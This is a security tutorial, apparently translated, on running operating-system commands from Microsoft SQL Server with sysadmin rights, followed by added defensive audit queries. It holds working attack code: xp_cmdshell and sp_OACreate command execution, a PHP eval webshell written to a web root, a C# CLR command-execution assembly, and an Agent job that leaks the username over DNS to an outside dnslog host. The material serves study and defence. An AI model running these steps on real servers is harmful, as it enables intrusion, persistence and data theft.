## Basics

Microsoft SQL Server is a relational database management system (DBMS) developed by Microsoft. It is used extremely widely, for everything from storing the contents of a personal blog to storing customer data.

SQL Server listens on TCP port 1433 by default.

The version I tested against here is Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64).

First, some basic commands:
```sql
-- current user name
select user;
-- version information
select @@version;
-- server host name
select @@servername;
-- current database name
select db_name();
-- client host name
select host_name();
-- is the current login a member of the sysadmin role? (1 = yes)
select is_srvrolemember('sysadmin');
```
## Common stored procedures

A stored procedure is a group of SQL statements that together perform a specific function; it is compiled once and persists. Users then execute it by specifying the procedure's name and its parameters.

xp_dirtree lists folders and files:
```sql
-- arguments: path, depth, include files (1 = list files as well as folders)
execute master.dbo.xp_dirtree 'c:\', 1, 1;
exec xp_dirtree 'c:\', 1, 1;
```
xp_dirtree can also be used to trigger NTLM requests.

For follow-up exploitation, a table can be created and bulk-loaded to read a file:
```sql
create table files(line varchar(1024));
bulk insert files from 'c:\windows\win.ini';
select * from files;
```
xp_create_subdir is a stored procedure for creating a subdirectory; its argument is the path of the subdirectory:
```sql
exec master.sys.xp_create_subdir 'C:\test';
```
xp_availablemedia returns all drives currently available.

## Command execution in MSSQL

### xp_cmdshell

xp_cmdshell is a SQL Server component that can be used to execute operating-system commands; any output is returned as text.

Prerequisites:

- the current user has DBA (sysadmin) privileges
- it depends on xplog70.dll
- it is disabled by default since SQL Server 2005 and must be enabled before use
1. Check whether xp_cmdshell exists
```sql
select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell';
```
A return value of 1 means it exists.

2. Enable the xp_cmdshell stored procedure
```sql
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell', 1;
reconfigure;
```
3. Execute a system command
```sql
exec master.dbo.xp_cmdshell 'whoami';
```
Note: if xp_cmdshell has been removed, xplog70.dll must be uploaded manually to restore it. In practice, if the call fails with a CreateProcess error, the xp_cmdshell call is usually being intercepted.

### SP_OACreate (Ole Automation Procedures)

In practice xp_cmdshell is often removed. When it has been deleted, the SP_OACreate and sp_OAMethod procedures can be used instead: the former creates an instance of an OLE object inside MSSQL, the latter calls a method of that OLE object.

Prerequisites:

- the current user has DBA (sysadmin) privileges
- it depends on odsole70.dll
1. First check the status of SP_OACREATE
```sql
select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'SP_OACREATE';
```
Returns 1 if it exists.

2. Enable the component
```sql
EXEC sp_configure 'show advanced options', 1
-- RECONFIGURE is a statement, not an sp_configure option; "EXEC sp_configure reconfigure" fails
RECONFIGURE
EXEC sp_configure 'Ole Automation Procedures', 1
RECONFIGURE
```
3. Execute a command by calling WScript.Shell

Executing a system command:

ProgID: WScript.Shell, CLSID: {72C24DD5-D70A-438B-8A42-98424B88AFB8}
```sql
DECLARE @object INT, @object2 INT, @object3 INT, @str VARCHAR(8000)
EXEC sp_OACreate 'WScript.Shell', @object OUTPUT
EXEC sp_OAMethod @object, 'exec', @object2 OUTPUT, 'C:\Windows\System32\cmd.exe /c whoami'
EXEC sp_OAMethod @object2, 'StdOut', @object3 OUTPUT
EXEC sp_OAMethod @object3, 'readall', @str OUTPUT
SELECT @str;
```
Writing a file with the FileSystemObject:

ProgID: Scripting.FileSystemObject, CLSID: {0D43FE01-F093-11CF-8940-00A0C9054228}
```sql
DECLARE @object INT, @object2 INT
EXEC Sp_OACreate 'Scripting.FileSystemObject', @object OUTPUT
EXEC sp_OAMethod @object, 'CreateTextFile', @object2 OUTPUT, 'C:\phpstudy_pro\WWW\shell.php', 1
EXEC sp_OAMethod @object2, 'WriteLine', NULL, '<?php @eval($_POST[cmd]);?>'
```
Writing a file with the ADODB.Stream object:

ProgID: ADODB.Stream, CLSID: {00000566-0000-0010-8000-00AA006D2EA4}
```sql
DECLARE @object INT
EXEC Sp_OACreate 'ADODB.Stream', @object OUTPUT
EXEC Sp_OASetProperty @object, 'Type', 1   -- 1 = binary stream
EXEC sp_OASetProperty @object, 'Mode', 3   -- 3 = read/write
EXEC sp_OAMethod @object, 'Open', NULL
EXEC sp_OAMethod @object, 'Write', NULL, 0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e
EXEC sp_OAMethod @object, 'SaveToFile', NULL, 'C:\phpstudy_pro\WWW\shell.php', 2   -- 2 = overwrite
EXEC sp_OAMethod @object, 'Close', NULL
EXEC sp_OADestroy @object
```
When the absolute path of the web root is known, this object can be used to write a webshell, which is also one way of dealing with a host that has no outbound connectivity.

### Common Language Runtime (CLR)

Since Microsoft SQL Server 2005, SQL Server has integrated the Common Language Runtime (CLR) of the Microsoft .NET Framework.

CLR integration means you can now write stored procedures, triggers, user-defined types, user-defined functions (scalar and table-valued) and user-defined aggregate functions in any .NET Framework language, including Microsoft Visual Basic .NET and Microsoft Visual C#.

Prerequisites:

CLR must be enabled, and to import an unsafe assembly the database must additionally be marked as trustworthy with the following statements (test is the database currently in use):
```sql
sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure 'clr enabled', 1;
RECONFIGURE;
ALTER DATABASE [test] SET trustworthy ON
```
Next, import the CLR assembly. The DLL can be imported as a hex byte stream, so no file needs to touch disk.

First create a SQL Server Database Project in Visual Studio.

Choose the target platform and tick the option to create a script.

Choose the target framework matching the server's version, and set the permission level to UNSAFE.
SQL Server 2005 introduced the ability to run .NET code from MSSQL, and later versions layered on many protections that restrict what the code can access. The permission set has three options:

- SAFE: essentially exposes only the MSSQL data set to the code; most other operations are prohibited
- EXTERNAL_ACCESS: allows access to certain resources on the underlying server, but should not allow direct code execution
- UNSAFE: allows any code to be executed

Next, create a SQL CLR C# stored procedure and add the code:
```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.Text;
using Microsoft.SqlServer.Server;

public partial class StoredProcedures
{
    // Entry point exposed to SQL Server as a CLR stored procedure
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void ExecCommand(string cmd)
    {
        SqlContext.Pipe.Send("Command is running, please wait.");
        SqlContext.Pipe.Send(RunCommand("cmd.exe", " /c " + cmd));
    }

    // Starts a process, captures stdout/stderr and reports the result through the SQL pipe
    public static string RunCommand(string filename, string arguments)
    {
        var process = new Process();
        process.StartInfo.FileName = filename;
        if (!string.IsNullOrEmpty(arguments))
        {
            process.StartInfo.Arguments = arguments;
        }
        process.StartInfo.CreateNoWindow = true;
        process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
        process.StartInfo.UseShellExecute = false;
        process.StartInfo.RedirectStandardError = true;
        process.StartInfo.RedirectStandardOutput = true;

        var stdOutput = new StringBuilder();
        process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data);

        string stdError = null;
        try
        {
            process.Start();
            process.BeginOutputReadLine();
            stdError = process.StandardError.ReadToEnd();
            process.WaitForExit();
        }
        catch (Exception e)
        {
            SqlContext.Pipe.Send(e.Message);
        }

        if (process.ExitCode == 0)
        {
            SqlContext.Pipe.Send(stdOutput.ToString());
        }
        else
        {
            var message = new StringBuilder();
            if (!string.IsNullOrEmpty(stdError))
            {
                message.AppendLine(stdError);
            }
            if (stdOutput.Length != 0)
            {
                message.AppendLine("Std output:");
                message.AppendLine(stdOutput.ToString());
            }
            SqlContext.Pipe.Send(filename + arguments + " finished with exit code = " + process.ExitCode + ": " + message);
        }
        return stdOutput.ToString();
    }
}
```
After compiling, a .sql file is generated that contains the SQL statements for the subsequent steps:
```sql
CREATE ASSEMBLY [Database1]
    AUTHORIZATION [dbo]
    FROM 0x... -- hex-encoded bytes of the compiled DLL (omitted here)
    WITH PERMISSION_SET = UNSAFE;
GO

CREATE PROCEDURE [dbo].[ExecCommand]
@cmd NVARCHAR (MAX) NULL
AS EXTERNAL NAME [Database1].[StoredProcedures].[ExecCommand]
GO

-- single quotes: with QUOTED_IDENTIFIER ON (the default) "whoami" would be parsed as an identifier
exec dbo.ExecCommand 'whoami';
```
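From the defender's side, every technique above (xp_cmdshell, Ole Automation Procedures, CLR with TRUSTWORTHY and UNSAFE assemblies) leaves a server-level setting or object behind. The following audit query, an added example rather than code from the original post, surfaces them in one pass; it assumes a sysadmin login and uses only documented catalog views plus the undocumented but widely used sp_MSforeachdb.

```sql
-- Added audit query (not from the original post). Run as sysadmin.
-- 1) Server options the techniques above switch on; value_in_use is the live value, 1 = enabled.
SELECT c.name, CAST(c.value_in_use AS int) AS value_in_use
FROM sys.configurations AS c
WHERE c.name IN ('xp_cmdshell',
                 'Ole Automation Procedures',
                 'clr enabled',
                 'clr strict security',   -- SQL Server 2017+; when 1, UNSAFE/EXTERNAL_ACCESS assemblies must be signed
                 'show advanced options')
ORDER BY c.name;

-- 2) Databases marked TRUSTWORTHY (the "ALTER DATABASE ... SET trustworthy ON" step).
--    msdb is TRUSTWORTHY by default; any other hit deserves a second look.
SELECT d.name, SUSER_SNAME(d.owner_sid) AS owner_login, d.is_trustworthy_on
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1
  AND d.name <> 'msdb';

-- 3) User-defined CLR assemblies with a permission set beyond SAFE, in every database.
--    permission_set_desc is SAFE_ACCESS, EXTERNAL_ACCESS or UNSAFE_ACCESS.
EXEC sp_MSforeachdb N'
USE [?];
SELECT DB_NAME() AS database_name, a.name AS assembly_name,
       a.permission_set_desc, a.create_date
FROM sys.assemblies AS a
WHERE a.is_user_defined = 1
  AND a.permission_set_desc <> ''SAFE_ACCESS'';';

-- Remediation for 1), if the options are not needed (mirror of the enable steps above):
-- EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
-- EXEC sp_configure 'Ole Automation Procedures', 0; RECONFIGURE;
-- EXEC sp_configure 'clr enabled', 0; RECONFIGURE;
```

Baseline the output once and diff it on a schedule; a newly TRUSTWORTHY database together with an UNSAFE_ACCESS assembly is the exact footprint of the CLR procedure described above.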
CLR exploitation tool WarSQLKit: https://github.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit

References: "Privilege escalation in MSSQL using CLR components" (在MSSQL中使用CLR组件提权), "Executing commands in MSSQL with CLR assemblies" (MSSQL使用CLR程序集来执行命令)

### SQL Server Agent jobs (scheduled tasks through the agent)

SQL Server Agent is a Microsoft Windows service that executes scheduled administrative tasks, which in SQL Server are called jobs.

Prerequisites:

- DBA (sysadmin) privileges
- the SQL Server Agent (sqlagent) service must be running

First start the SQL Server Agent (sqlagent) service:
```sql
exec master.dbo.xp_servicecontrol 'start', 'SQLSERVERAGENT';
```
Execute the command through a scheduled job. Since nothing is echoed back, a DNS log can be used to carry the result out of band:
```sql
use msdb;
-- sp_delete_job @job_id, @job_name
exec sp_delete_job null, 'test'
exec sp_add_job 'test'
-- sp_add_jobstep @job_id, @job_name, @step_id, @step_name, @subsystem, @command
exec sp_add_jobstep null, 'test', null, '1', 'cmdexec', 'cmd.exe /c "ping %USERNAME%.fb7gzla4.dnslog.pw"'
-- sp_add_jobserver @job_id, @job_name, @server_name
exec sp_add_jobserver null, 'test', @@servername
exec sp_start_job 'test';
```
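The job created above is persistent and visible in msdb, which is where a defender should look for it. The following query, an added example that is not part of the original post, checks whether the Agent service is running and lists every job step that runs operating-system commands or calls the procedures discussed earlier, together with its owner and most recent run; it assumes SQL Server 2008 R2 SP1 or later for sys.dm_server_services.

```sql
-- Added audit query (not from the original post). Run as sysadmin.
-- 1) Is the Agent service running at all? (xp_servicecontrol 'start' above flips this)
SELECT servicename, startup_type_desc, status_desc
FROM sys.dm_server_services;

-- 2) Job steps that leave T-SQL: CmdExec/PowerShell subsystems, or T-SQL steps that
--    reach for xp_cmdshell / sp_OACreate. Newest jobs first.
SELECT j.name                    AS job_name,
       j.enabled,
       SUSER_SNAME(j.owner_sid)  AS owner_login,
       j.date_created,
       s.step_id,
       s.step_name,
       s.subsystem,
       s.command,
       s.last_run_date,           -- yyyymmdd as int, 0 if never run
       s.last_run_time            -- hhmmss as int
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell')
   OR s.command LIKE '%xp_cmdshell%'
   OR s.command LIKE '%sp_OACreate%'
ORDER BY j.date_created DESC, s.step_id;

-- 3) Execution history for those steps: run_status 1 = succeeded, 0 = failed.
SELECT j.name AS job_name, h.step_id, h.run_status, h.run_date, h.run_time, h.message
FROM msdb.dbo.sysjobhistory AS h
JOIN msdb.dbo.sysjobs AS j ON j.job_id = h.job_id
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = h.job_id AND s.step_id = h.step_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell')
ORDER BY h.run_date DESC, h.run_time DESC;
```

A CmdExec step owned by a login that is not a member of sysadmin is worth investigating on its own, since the Agent runs such steps under the service account unless a proxy is configured.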
References: "Learning Microsoft SQL Server database attack and defense from scratch" (从0开始学习Microsoft SQL Server数据库攻防), "MSSQL privilege escalation summary" (mssql 提权总结), "Summary of command execution in MSSQL databases" (Mssql数据库命令执行总结), "Executing commands with MSSQL stored procedures" (MSSQL存储过程执行命令), "MSSQL injection and exploitation techniques summary" (干货 | MSSQL注入和漏洞利用姿势总结)